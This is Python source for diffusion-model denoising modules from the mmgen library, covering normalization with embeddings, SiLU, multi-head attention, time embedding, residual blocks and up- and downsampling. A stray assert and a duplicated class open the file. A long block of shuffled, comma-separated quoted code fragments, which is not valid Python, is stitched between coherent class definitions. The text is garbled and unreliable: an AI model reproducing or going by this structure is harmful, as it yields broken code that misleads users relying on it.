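    assert block(x, y).shape == (2, 128, 32, 32)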
@MODULES.register_module()
class NormWithEmbedding(nn.Module):
    """Normalization with embedding layer. If `use_scale_shift == True`, the
    embedding results will be chunked and used to re-shift and re-scale the
    normalization results. Otherwise, the embedding results will directly be
    added to the input of the normalization layer.

    Args:
        in_channels (int): Number of channels of the input feature map.
        embedding_channels (int): Number of channels of the input embedding.
        norm_cfg (dict, optional): Config for the normalization operation.
            Defaults to `dict(type='GN', num_groups=32)`.
        act_cfg (dict, optional): Config for the activation layer. Defaults
            to `dict(type='SiLU', inplace=False)`.
        use_scale_shift (bool): If True, the output of the embedding layer
            will be split into 'scale' and 'shift', which map the output of
            the normalization layer to ``out * (1 + scale) + shift``.
            Otherwise, the output of the embedding layer is added to the
            input before the normalization operation. Defaults to True.
    """

    def __init__(self,
                 in_channels,
                 embedding_channels,
                 norm_cfg=dict(type='GN', num_groups=32),
                 act_cfg=dict(type='SiLU', inplace=False),
                 use_scale_shift=True):
        super().__init__()
        self.use_scale_shift = use_scale_shift
        _, self.norm = build_norm_layer(norm_cfg, in_channels)

        embedding_output = in_channels * 2 if use_scale_shift else in_channels
        self.embedding_layer = nn.Sequential(
            build_activation_layer(act_cfg),
            nn.Linear(embedding_channels, embedding_output))

    def forward(self, x, y):
        """Forward function.

        Args:
            x (torch.Tensor): Input feature map tensor.
            y (torch.Tensor): Shared time embedding or shared label embedding.

        Returns:
            torch.Tensor: Output feature map tensor.
        """
        embedding = self.embedding_layer(y)[:, :, None, None]
        if self.use_scale_shift:
            scale, shift = torch.chunk(embedding, 2, dim=1)
            x = self.norm(x)
            x = x * (1 + scale) + shift
        else:
            x = self.norm(x + embedding)
        return x
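# Minimal sketch contrasting the two conditioning modes of
# ``NormWithEmbedding``; the sizes are illustrative assumptions. With
# ``use_scale_shift=True`` the embedding is projected to ``2 * in_channels``
# and split into per-channel scale and shift; with ``False`` it is projected
# to ``in_channels`` and added to ``x`` before normalization.
def _demo_norm_with_embedding():
    x = torch.randn(2, 64, 16, 16)
    y = torch.randn(2, 512)
    for use_scale_shift in (True, False):
        norm = NormWithEmbedding(
            in_channels=64,
            embedding_channels=512,
            use_scale_shift=use_scale_shift)
        assert norm(x, y).shape == x.shape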
Otherwise, the output of Embedding layer", "Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32),", "in_channels, with_conv=True): super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else:", "dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward function", "(bool, optional): Use inplace operation or not. Defaults to `False`. \"\"\" def __init__(self,", "build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential):", "Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__", "embedding. embedding_mode (str, optional): Embedding mode for the time embedding. Defaults to 'sin'.", "(torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding or shared label", "use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels", "in `NormWithEmbedding` layer. dropout (float): Probability of the dropout layers. out_channels (int, optional):", "to re-shift and re-scale normalization results. Otherwise, embedding results will directly add to", "but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels", "self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the", "other. Originally ported from here, but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. #", "return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise.", "shortcut = self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x)", "children that support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def", "the embedding. max_period (int, optional): Controls the minimum frequency of the embeddings. Defaults", "time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal", "of the input feature map. embedding_channels (int): Number of channels of the input", "layer will be split to 'scale' and 'shift' and map the output of", "for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x", "num_groups=32)`. act_cfg (dict, optional): Config for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`.", "embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network.", "SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if", "activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. 
\"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None,", "return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to", "results will directly add to input of normalization layer. Args: in_channels (int): Number", "will directly add to input of normalization layer. Args: in_channels (int): Number of", "to 'scale' and 'shift' and map the output of normalization layer to ``out", "the time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding.", "with_conv (bool, optional): Whether apply an additional convolution layer after upsampling. Defaults to", "in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut", "to the children that support it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35", "= deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels,", "feature map to be downsampled. with_conv (bool, optional): Whether apply an additional convolution", "(SiLU) function, element-wise. The SiLU function is also known as the swish function.", "convolution layer after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__()", "= build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift else in_channels self.embedding_layer", "networks. Args: in_channels (int): The channel number of the input feature map. embedding_channels", "[ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg =", "for the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm,", "@staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep", "3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg)", "to downsample. Returns: torch.Tensor: Feature map after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class", "/ half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)", "attention. Args: x (torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after attention.", "_, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels * 2 if use_scale_shift else", "dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D", "results shape as `[bz, dim]`. \"\"\" half = dim // 2 freqs =", "_, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3,", "mode for the time embedding. Defaults to 'sin'. 
embedding_cfg (dict, optional): Config for", "padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self,", "self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x = layer(x) return", "inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch < 1.6.0,", "dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn =", "else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. Args:", "* scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight", "downsample operation. Args: in_channels (int): Number of channels of the input feature map", "_norm_cfg = deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg),", "layers will be added. Args: in_channels (int): Number of channels of the input", "torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts', q *", "the shortcut conv. Defaults to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout,", "# add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not", "and used to re-shift and re-scale normalization results. Otherwise, embedding results will directly", "from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init", "map. num_heads (int, optional): Number of heads in the attention. norm_cfg (dict, optional):", "map. embedding_channels (int) Number of channels of the input embedding. norm_cfg (dict, optional):", "= nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling", "dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def", "] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only support", "Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of the dropout layers.", "dim=-1) if dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return", "Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map after downsampling.", "np import torch import torch.nn as nn import torch.nn.functional as F from mmcv.cnn", "Number of channels of the input feature map. embedding_channels (int): Number of channels", "\"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding results will be chunked", "shortcut conv. Defaults to ``1``. 
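

# Illustrative check (not part of the original module): on torch >= 1.6 the
# forward pass delegates to ``F.silu``; the manual fallback computes the same
# x * sigmoid(x) value, so both paths agree numerically.
def _silu_example():
    x = torch.linspace(-3, 3, steps=7)
    assert torch.allclose(SiLU()(x), x * torch.sigmoid(x))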
\"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None,", "build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in", "for time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create", "norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels,", "feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale,", "F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import", "of normalization layer to ``out * (1 + scale) + shift``. Otherwise, the", "* 2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def", "self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] //", "@MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows users to", "x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2])", "time embedding or shared label embedding. Returns: torch.Tensor : Output feature map tensor.", "to attend to each other. Originally ported from here, but adapted to the", "True self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function", "\"\"\"Time embedding layer, reference to Two level embedding. First embedding time by an", "padding=1) ] self.conv_1 = nn.Sequential(*conv_1) norm_with_embedding_cfg = dict( in_channels=out_channels, embedding_channels=embedding_channels, use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding", "= timesteps[:, None].float() * freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim %", "torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x * (1 + scale)", "channel = qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3, dim=1) scale", "`1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels !=", "= build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1) self.proj = nn.Conv1d(in_channels,", "self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN` for time embedding, '", "embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels,", "optional): Number of heads in the attention. norm_cfg (dict, optional): Config for normalization", "DenoisingResBlock): x = layer(x, y) else: x = layer(x) return x @ACTIVATION_LAYERS.register_module() class", "torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks", "kernel size for the shortcut conv. Defaults to ``1``. 
\"\"\" def __init__(self, in_channels,", "(bool, optional): Whether use convolution operation for downsampling. Defaults to `True`. \"\"\" def", "def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map tensor.", "return x def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature", "embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN':", "embedding def forward(self, t): \"\"\"Forward function for time embedding layer. Args: t (torch.Tensor):", "downsampling operation. Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map", "Whether apply an additional convolution layer after upsampling. Defaults to `True`. \"\"\" def", "for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\"", "function. Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding", "be chunked and used to re-shift and re-scale normalization results. Otherwise, embedding results", "output of Embedding layer will be split to 'scale' and 'shift' and map", "layer. dropout (float): Probability of the dropout layers. out_channels (int, optional): Number of", "inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output =", "class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If `in_channels` not equals to `out_channels`,", "x): \"\"\"Forward function for multi head attention. Args: x (torch.Tensor): Input feature map.", "import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from", "of the input feature map to be downsampled. with_conv (bool, optional): Whether use", "super().__init__() if with_conv: self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample =", "import numpy as np import torch import torch.nn as nn import torch.nn.functional as", "Config for time embedding. Defaults to None. act_cfg (dict, optional): Config for activation", "Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config", "torch.__version__ < '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for", "h = self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0)", "with embedding layer. If `use_scale_shift == True`, embedding results will be chunked and", "to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output of Embedding layer will", "0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift == True`, embedding", "embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising network. If", "import torch import torch.nn as nn import torch.nn.functional as F from mmcv.cnn import", "], ('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut", "upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x = self.conv(x) return", "f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. 


@MODULES.register_module()
class TimeEmbedding(nn.Module):
    """Time embedding layer implemented as a two-level embedding: the
    timestep is first embedded by an embedding function, then fed to a small
    neural network.

    Args:
        in_channels (int): The channel number of the input feature map.
        embedding_channels (int): The channel number of the output embedding.
        embedding_mode (str, optional): Embedding mode for the time embedding.
            Defaults to 'sin'.
        embedding_cfg (dict, optional): Config for the time embedding.
            Defaults to None.
        act_cfg (dict, optional): Config for the activation layer. Defaults
            to ``dict(type='SiLU', inplace=False)``.
    """

    def __init__(self,
                 in_channels,
                 embedding_channels,
                 embedding_mode='sin',
                 embedding_cfg=None,
                 act_cfg=dict(type='SiLU', inplace=False)):
        super().__init__()
        self.blocks = nn.Sequential(
            nn.Linear(in_channels, embedding_channels),
            build_activation_layer(act_cfg),
            nn.Linear(embedding_channels, embedding_channels))

        # add `dim` to embedding config
        embedding_cfg_ = dict(dim=in_channels)
        if embedding_cfg is not None:
            embedding_cfg_.update(embedding_cfg)
        if embedding_mode.upper() == 'SIN':
            self.embedding_fn = partial(self.sinusodial_embedding,
                                        **embedding_cfg_)
        else:
            raise ValueError('Only support `SIN` for time embedding, '
                             f'but receive {embedding_mode}.')

    @staticmethod
    def sinusodial_embedding(timesteps, dim, max_period=10000):
        """Create sinusoidal timestep embeddings.

        Args:
            timesteps (torch.Tensor): Timesteps to embed. 1-D tensor shaped
                as ``[bz, ]``, one per batch element.
            dim (int): The dimension of the embedding.
            max_period (int, optional): Controls the minimum frequency of
                the embeddings. Defaults to ``10000``.

        Returns:
            torch.Tensor: Embedding results shaped as ``[bz, dim]``.
        """
        half = dim // 2
        freqs = torch.exp(
            -np.log(max_period) *
            torch.arange(start=0, end=half, dtype=torch.float32) /
            half).to(device=timesteps.device)
        args = timesteps[:, None].float() * freqs[None]
        embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)
        if dim % 2:
            embedding = torch.cat(
                [embedding, torch.zeros_like(embedding[:, :1])], dim=-1)
        return embedding

    def forward(self, t):
        """Forward function for the time embedding layer.

        Args:
            t (torch.Tensor): Input timesteps.

        Returns:
            torch.Tensor: Timestep embedding.
        """
        return self.blocks(self.embedding_fn(t))
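

# Illustrative sketch (not part of the original module): the sinusoidal
# embedding maps each scalar timestep t to ``[cos(t * f_0), ..., sin(t *
# f_0), ...]`` with geometrically spaced frequencies
# ``f_i = max_period ** (-i / half)``. `dim=8` is an arbitrary assumption.
def _time_embedding_example():
    t = torch.tensor([0, 10, 999])
    emb = TimeEmbedding.sinusodial_embedding(t, dim=8)
    assert emb.shape == (3, 8)
    # t = 0 yields cos(0) = 1 in the first half and sin(0) = 0 in the second
    assert torch.allclose(emb[0, :4], torch.ones(4))
    assert torch.allclose(emb[0, 4:], torch.zeros(4))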


@MODULES.register_module()
class DenoisingResBlock(nn.Module):
    """Resblock for the denoising network. If `in_channels` does not equal
    `out_channels`, a learnable shortcut with conv layers will be added.

    Args:
        in_channels (int): Number of channels of the input feature map.
        embedding_channels (int): Number of channels of the input embedding.
        use_scale_shift_norm (bool): Whether to use scale-shift-norm in the
            `NormWithEmbedding` layer.
        dropout (float): Probability of the dropout layers.
        out_channels (int, optional): Number of output channels of the
            ResBlock. If not defined, the output channels will equal
            `in_channels`. Defaults to `None`.
        norm_cfg (dict, optional): The config for the normalization layers.
            Defaults to ``dict(type='GN', num_groups=32)``.
        act_cfg (dict, optional): The config for the activation layers.
            Defaults to ``dict(type='SiLU', inplace=False)``.
        shortcut_kernel_size (int, optional): The kernel size for the
            shortcut conv. Defaults to ``1``.
    """

    def __init__(self,
                 in_channels,
                 embedding_channels,
                 use_scale_shift_norm,
                 dropout,
                 out_channels=None,
                 norm_cfg=dict(type='GN', num_groups=32),
                 act_cfg=dict(type='SiLU', inplace=False),
                 shortcut_kernel_size=1):
        super().__init__()
        out_channels = in_channels if out_channels is None else out_channels

        _norm_cfg = deepcopy(norm_cfg)

        _, norm_1 = build_norm_layer(_norm_cfg, in_channels)
        conv_1 = [
            norm_1,
            build_activation_layer(act_cfg),
            nn.Conv2d(in_channels, out_channels, 3, padding=1)
        ]
        self.conv_1 = nn.Sequential(*conv_1)

        norm_with_embedding_cfg = dict(
            in_channels=out_channels,
            embedding_channels=embedding_channels,
            use_scale_shift=use_scale_shift_norm,
            norm_cfg=_norm_cfg)
        self.norm_with_embedding = build_module(
            dict(type='NormWithEmbedding'),
            default_args=norm_with_embedding_cfg)

        conv_2 = [
            build_activation_layer(act_cfg),
            nn.Dropout(dropout),
            nn.Conv2d(out_channels, out_channels, 3, padding=1)
        ]
        self.conv_2 = nn.Sequential(*conv_2)

        assert shortcut_kernel_size in [
            1, 3
        ], ('Only support `1` and `3` for `shortcut_kernel_size`, but '
            f'receive {shortcut_kernel_size}.')

        self.learnable_shortcut = out_channels != in_channels

        if self.learnable_shortcut:
            shortcut_padding = 1 if shortcut_kernel_size == 3 else 0
            self.shortcut = nn.Conv2d(
                in_channels,
                out_channels,
                shortcut_kernel_size,
                padding=shortcut_padding)
        self.init_weights()

    def forward_shortcut(self, x):
        if self.learnable_shortcut:
            return self.shortcut(x)
        return x

    def forward(self, x, y):
        """Forward function.

        Args:
            x (torch.Tensor): Input feature map tensor.
            y (torch.Tensor): Shared time embedding or shared label embedding.

        Returns:
            torch.Tensor: Output feature map tensor.
        """
        shortcut = self.forward_shortcut(x)
        x = self.conv_1(x)
        x = self.norm_with_embedding(x, y)
        x = self.conv_2(x)
        return x + shortcut

    def init_weights(self):
        # apply zero init to the last conv layer so the block starts out as
        # an identity residual
        constant_init(self.conv_2[-1], 0)
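

# Illustrative sketch (not part of the original module): with differing
# in/out channels the block builds a learnable conv shortcut, so the output
# channel count follows `out_channels` while the spatial size is preserved.
# Sizes are arbitrary assumptions for the demo.
def _resblock_example():
    block = DenoisingResBlock(
        in_channels=32,
        embedding_channels=128,
        use_scale_shift_norm=True,
        dropout=0.1,
        out_channels=64)
    x = torch.randn(2, 32, 16, 16)
    y = torch.randn(2, 128)
    assert block(x, y).shape == (2, 64, 16, 16)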
\"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in", "use_scale_shift=use_scale_shift_norm, norm_cfg=_norm_cfg) self.norm_with_embedding = build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels,", "act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add", "num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None else", "embedding layer. Args: t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return", "channels of the ResBlock. If not defined, the output channels will equal to", "function for downsampling operation. Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor:", "the output of Embedding layer will be added with the input before normalization", "3 ], ('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.')", "SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit (SiLU) function, element-wise. The SiLU function is", "== True`, embedding results will be chunked and used to re-shift and re-scale", "supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self,", "be split to 'scale' and 'shift' and map the output of normalization layer", "in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling operation. Args:", "= x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1,", "forward(self, x): \"\"\"Forward function for SiLU. Args: x (torch.Tensor): Input tensor. Returns: torch.Tensor:", "// 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args", "1 if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size,", "Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The config for the activation layers.", "not. Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0'", "use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y):", "= self.forward_shortcut(x) x = self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return", "timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz,", "self.downsample = nn.AvgPool2d(stride=2) def forward(self, x): \"\"\"Forward function for downsampling operation. Args: x", "timestep embeddings to the children that support it as an extra input. Modified", "k * scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return", "= in_channels if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg) _, norm_1", "Config for normalization layer. 
Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1,", "QKVAttention(qkv): channel = qkv.shape[1] // 3 q, k, v = torch.chunk(qkv, 3, dim=1)", "for the denoising network. If `in_channels` not equals to `out_channels`, a learnable shortcut", "y): for layer in self: if isinstance(layer, DenoisingResBlock): x = layer(x, y) else:", "Input tensor. Returns: torch.Tensor: Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return", "nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv): channel = qkv.shape[1] // 3 q,", "act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output", "MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend to each other. Originally", "t (torch.Tensor): Input timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class", "(int, optional): The kernel size for the shortcut conv. Defaults to ``1``. \"\"\"", "to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__()", "(int): The channel number of the input feature map. embedding_channels (int): The channel", "convolution layer after the nearest interpolation operation. Args: in_channels (int): Number of channels", "*spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to", "import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from mmgen.models.builder", "nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config embedding_cfg_ =", "If `in_channels` not equals to `out_channels`, a learnable shortcut with conv layers will", "embedding. norm_cfg (dict, optional): Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`.", "= nn.Sequential(*conv_2) assert shortcut_kernel_size in [ 1, 3 ], ('Only support `1` and", "torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\" half = dim // 2", "= build_module( dict(type='NormWithEmbedding'), default_args=norm_with_embedding_cfg) conv_2 = [ build_activation_layer(act_cfg), nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1)", "downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.downsample", "2, dim=1) x = self.norm(x) x = x * (1 + scale) +", "optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels,", "sequential module that passes timestep embeddings to the children that support it as", "freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:,", "2 if use_scale_shift else in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self,", "Support average pooling and convolution for downsample operation. 
